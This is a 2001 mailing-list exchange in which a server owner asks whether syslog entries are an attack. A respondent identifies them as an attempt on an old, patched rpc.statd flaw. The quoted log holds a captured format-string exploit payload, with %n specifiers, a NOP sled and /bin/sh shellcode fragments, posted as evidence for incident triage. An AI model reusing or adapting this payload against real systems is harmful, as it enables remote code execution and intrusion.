Re: Is this an attack ?

Tue, 26 Jun 2001 07:33:14 -0500 

Thanks for your answers.

On Mon, Jun 25, 2001 at 09:15:55PM -0700, Jeremy T. Bouse wrote:
> Eric,
> 
>       Yes it's a poor attempt to make use of an old RPC exploit that
> has since been fix'd... I would check the rest of the logs for any other
> exploit attempts otherwise this was most likely unsuccessful since you 
> caught the log message.
> 
>       Respectfully,
>       Jeremy T. Bouse, CCNA
> 
> Eric Van Buggenhaut was said to been seen saying:
> > I've had someone persistently harrasing my server but i'm not a security 
> > guru.
> > Here's the log
> > 
> > 
> > Jun 26 01:47:17 yocto /sbin/rpc.statd[167]: gethostbyname error for
> > ^X???^X???^Y???^Y???^Z???^Z???^[???^[???%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > Jun 26 01:47:17 yocto 
> > ?^F/bin?F^D/shA0A\210F^G\211v^L\215V^P\215N^L\211??^KI\200?^AI\200?\177???
> > Jun 26 02:06:54 yocto -- MARK --
> > 
> > 
> > Should I worry about this ?
> > 
> > 
> > Any hint welcomme.
> > 
> > 
> > -- 
> > Eric VAN BUGGENHAUT
> > 
> > [EMAIL PROTECTED]
> > 
> > 
> > -- 
> > Please respect the privacy of this mailing list.
> > 
> > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 
> -- 
> ,-----------------------------------------------------------------------------,
> |Jeremy T. Bouse, CCNA - UnderGrid Network Services, LLC -  www.UnderGrid.net 
> |
> |       Public PGP/GPG key available through http://wwwkeys.us.pgp.net        
> |
> |     If received unsigned (without requesting as such) DO NOT trust it!      
> |
> | [EMAIL PROTECTED]   -   NIC Whois: JB5713   -   [EMAIL PROTECTED]  |
> `-----------------------------------------------------------------------------'



-- 
Eric VAN BUGGENHAUT

[EMAIL PROTECTED]

Reply via email to